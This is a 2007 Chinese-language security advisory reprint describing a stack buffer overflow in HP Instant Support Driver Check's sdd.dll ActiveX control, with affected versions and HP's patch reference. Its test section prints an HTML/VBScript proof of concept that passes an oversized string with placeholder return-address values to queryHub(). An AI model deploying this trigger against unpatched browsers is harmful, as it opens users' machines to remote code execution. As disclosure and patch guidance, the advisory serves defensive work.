发布日期:2007-07-02
更新日期:2007-07-04
受影响系统:
HP Instant Support - Driver Check < v1.5.0.3
- Microsoft Windows XP SP2
不受影响系统:
HP Instant Support - Driver Check v1.5.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24730
惠普即时支持驱动程序检测(HP Instant Support Driver Check)功能可帮助客户确定他们是否正在使用最新的打印驱动程序。
HP即时支持驱动程序检查sdd.dll处理参数数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。
运行在Windows XP平台上的HP即时支持驱动程序检测(sdd.dll,CLSID为156BF4B7-AE3A-4365-BD88-95A75AF8F09D)没有正确地验证传送给queryHub()方式的参数。如果用户受骗访问了恶意站点并向该方式传送了超过226字节的超长参数的话,就可能触发栈溢出,导致执行任意指令。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/25918/
http://marc.info/?l=bugtraq&m=118347899926354&w=2
http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=118336
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
<script language = 'vbscript'>
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2
test.queryHub egg
</script>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
HP
--
HP已经为此发布了一个安全公告(HPSBPI02228)以及相应补丁:
HPSBPI02228:SSRT071404 rev.1 - HP Instant Support - Driver Check Running on Windows XP, Remote Unauthorized Access
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver
【绿盟授权51CTO.COM 独家报道,未经书面许可不得转载!】
推荐阅读
IBM Lotus Notes出现远程栈溢出漏洞 官方补丁已发
发布日期:2007-10-24 更新日期:2007-10-25受影响系统: IBM Lotus Notes 8.0 IBM Lotus Notes 7.0 IBM Lotus Notes 6.5 描述: ------------------------------------------------------------------------->>>详细阅读
本文标题:HP即时支持驱动程序检查sdd.dll栈缓冲区溢出漏洞
地址:http://www.17bianji.com/anquan/buding/2589.html
1/2 1